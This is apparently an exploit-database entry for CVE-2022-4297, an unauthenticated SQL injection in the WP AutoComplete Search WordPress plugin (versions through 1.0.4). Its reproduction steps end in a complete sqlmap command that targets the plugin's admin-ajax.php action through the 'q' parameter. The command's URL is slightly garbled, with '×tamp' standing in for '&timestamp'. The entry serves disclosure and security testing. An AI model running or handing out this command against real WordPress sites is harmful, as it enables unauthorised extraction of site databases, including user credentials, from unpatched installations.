
24 lines
No EOL
992 B
Text
# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi
# Date: 30/06/2023
# Exploit Author: Matin nouriyan (matitanium)
# Version: <= 1.0.4
# CVE: CVE-2022-4297
# Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/
# Tested on: Kali linux

---------------------------------------

The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise
and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users,
leading to an unauthenticated SQL injection.

--------------------------------------

How to Reproduce this Vulnerability:
|
|
|
|
1. Install WP AutoComplete <= 1.0.4
|
|
2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests
|
|
3. Find requests belong to WP AutoComplete like step 5
|
|
4. Start sqlmap and exploit
|
|
5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000×tamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q |